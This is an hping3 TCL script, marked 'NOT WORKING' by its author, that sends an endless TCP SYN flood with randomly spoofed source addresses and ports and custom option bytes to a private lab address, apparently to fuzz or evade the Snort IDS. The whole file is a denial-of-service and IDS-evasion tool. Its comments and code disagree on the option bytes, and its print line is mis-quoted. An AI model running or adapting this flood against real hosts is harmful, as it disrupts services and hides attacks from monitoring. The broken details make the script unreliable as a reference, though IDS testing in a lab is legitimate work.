# tcp_snort_06.htcl
# NOT WORKING

# TCP SYN Flood with raw TCP options set to 0600ffff (for Snort evasion/fuzzing) in hping3 TCL scripting

set dst_ip "192.168.100.2"
set dst_port 50001
set window 8192
set seq 0
set count 0

# Function to generate random IP address
proc random_ip {} {
    return "[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}]"
}

# Function to generate random source port (1024–65535)
proc random_port {} {
    return [expr {int(rand()*64512) + 1024}]
}

while {1} {
    set saddr [random_ip]
    set sport [random_port]
    # TCP SYN packet with custom options (0600ffff as hex)
    # Use tcpopt.eol (0), tcpopt.nop (1), then two unknown bytes (ff ff)
    set pkt "ip(saddr=$saddr,daddr=$dst_ip,ttl=64)+tcp(sport=$sport,dport=$dst_port,flags=s,win=$window,seq=$seq)+tcpopt.eol()+data(hex=00ffff)"
    hping send $pkt
    incr count
    # Print every 1000 packets sent
    if {[expr {$count % 1000}] == 0} {
        puts \"$count TCP SYN packets with 0600ffff options sent so far...\"
    }
}

# To run: sudo hping3 exec tcp_snort_06.htcl